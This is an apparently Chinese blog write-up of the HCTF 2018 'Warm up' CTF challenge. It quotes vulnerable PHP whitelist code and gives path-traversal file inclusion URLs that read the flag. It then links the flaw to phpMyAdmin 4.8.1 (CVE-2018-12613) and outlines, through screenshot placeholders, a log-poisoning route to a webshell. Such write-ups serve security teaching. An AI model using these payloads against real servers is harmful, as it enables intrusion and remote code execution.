Warm_up(HCTF_2018)

Warm up

考察知识点:

  • 文件包含漏洞

  • 代码审计

解题步骤

  1. 首先我们进来看到了一个滑稽的表情,没啥别的东西,先看看源码

image-20200805100128095

  1. 源码中发现有注释 source.php

image-20200805100416791

  1. 我们访问source.php,得到代码

     <?php
        highlight_file(__FILE__);
        class emmm
        {
            public static function checkFile(&$page)
            {
                $whitelist = ["source"=>"source.php","hint"=>"hint.php"];//白名单
                if (! isset($page) || !is_string($page)) {
                    echo "you can't see it";
                    return false;
                }
    
                if (in_array($page, $whitelist)) {
                    return true;
                }
    
                $_page = mb_substr(
                    $page,
                    0,
                    mb_strpos($page . '?', '?')
                );
                if (in_array($_page, $whitelist)) {
                    return true;
                }
    
                $_page = urldecode($page);
                $_page = mb_substr(
                    $_page,
                    0,
                    mb_strpos($_page . '?', '?')
                );
                if (in_array($_page, $whitelist)) {
                    return true;
                }
                echo "you can't see it";
                return false;
            }
        }
    
    	//用$_REQUEST来接收file参数
        if (! empty($_REQUEST['file'])//file不为空
            && is_string($_REQUEST['file'])//file是字符串
            && emmm::checkFile($_REQUEST['file'])//file通过checkFile
        ) {
            include $_REQUEST['file']; 
            exit;
        } else {
            echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
        }  
    ?> 
    
  2. 我们在source的白名单中,发现还有一个文件hint.php,访问知道了flag的位位置

    image-20200805101023150

  3. 现在的问题就是如何使的checkFile为真。

    • in_array() 函数搜索数组中是否存在指定的值
    • mb_substr() 函数与我们学过 substr() 函数差不多,如果要分割英文则使用substr(),如果要分割中文则需要使用 mb_substr()
    • mb_strpos() 查找字符串在另一个字符串中首次出现的位置

    我们在把代码复制下来,在本地搭建一下,加上几句echo

    image-20200805102036984

  4. 我们传入一下url

    http://b60922ee-d3a8-4f8c-9191-f06e104e698d.node3.buuoj.cn/source.php?file=hint.php?/../../../../../ffffllllaaaagggg

    或者http://b60922ee-d3a8-4f8c-9191-f06e104e698d.node3.buuoj.cn/source.php?file=hint.php%253f/../../../../../ffffllllaaaagggg

    可以看到之后执行的是include(hint.php?/../../../../../ffffllllaaaagggg),这里能包含成功,是因为它吧hint.php?当作了文件夹.

phpmyadmin 4.8.1任意文件包含(CVE-2018-12613)

代码节选与本题很相似

public static $goto_whitelist = array(
    'db_datadict.php',
    'db_sql.php',
    'db_events.php',
    'db_export.php',
    'db_importdocsql.php',
    'db_multi_table_query.php',
    'db_structure.php',
    'db_import.php',
    'db_operations.php',
    'db_search.php',
    'db_routines.php',
    'export.php',
    'import.php',
    'index.php',
    'pdf_pages.php',
    'pdf_schema.php',
    'server_binlog.php',
    'server_collations.php',
    'server_databases.php',
    'server_engines.php',
    'server_export.php',
    'server_import.php',
    'server_privileges.php',
    'server_sql.php',
    'server_status.php',
    'server_status_advisor.php',
    'server_status_monitor.php',
    'server_status_queries.php',
    'server_status_variables.php',
    'server_variables.php',
    'sql.php',
    'tbl_addfield.php',
    'tbl_change.php',
    'tbl_create.php',
    'tbl_import.php',
    'tbl_indexes.php',
    'tbl_sql.php',
    'tbl_export.php',
    'tbl_operations.php',
    'tbl_structure.php',
    'tbl_relation.php',
    'tbl_replace.php',
    'tbl_row_action.php',
    'tbl_select.php',
    'tbl_zoom_select.php',
    'transformation_overview.php',
    'transformation_wrapper.php',
    'user_password.php',
);


/**
     * boolean phpMyAdmin.Core::checkPageValidity(string &$page, array $whitelist)
     *
     * checks given $page against given $whitelist and returns true if valid
     * it optionally ignores query parameters in $page (script.php?ignored)
     *
     * @param string &$page     page to check
     * @param array  $whitelist whitelist to check page against
     *
     * @return boolean whether $page is valid or not (in $whitelist or not)
     */
public static function checkPageValidity(&$page, array $whitelist = [])
{
    if (empty($whitelist)) {
        $whitelist = self::$goto_whitelist;
    }
    if (! isset($page) || !is_string($page)) {
        return false;
    }

    if (in_array($page, $whitelist)) {
        return true;
    }

    $_page = mb_substr(
        $page,
        0,
        mb_strpos($page . '?', '?')
    );
    if (in_array($_page, $whitelist)) {
        return true;
    }

    $_page = urldecode($page);
    $_page = mb_substr(
        $_page,
        0,
        mb_strpos($_page . '?', '?')
    );
    if (in_array($_page, $whitelist)) {
        return true;
    }

    return false;
}


$target_blacklist = array (     //黑名单
    'import.php', 'export.php'
);

if (! empty($_REQUEST['target'])#target 非空
    && is_string($_REQUEST['target'])#target为字符串
    && ! preg_match('/^index/', $_REQUEST['target'])#target不能以index开头
    && ! in_array($_REQUEST['target'], $target_blacklist)#target不能在黑名单中
    && Core::checkPageValidity($_REQUEST['target'])#target要通过checkPageValidity
) {
    include $_REQUEST['target'];
    exit;
}

我们搭建环境测试一下

image-20200805104850733

查询一下general_log的开启状态

image-20200805105314580

将日志产生的默认路径改更改为已知路径。执行成功后,查看日志文件是否生成

image-20200805110413013

检查是否产生日志文件

image-20200805110449453

写入一句话木马

image-20200805111704272

image-20200805111657086

测试一下

image-20200805112015813

image-20200805112932614

image-20200805113709850

posted @ 2020-08-05 11:46  Rookle  阅读(229)  评论(0编辑  收藏  举报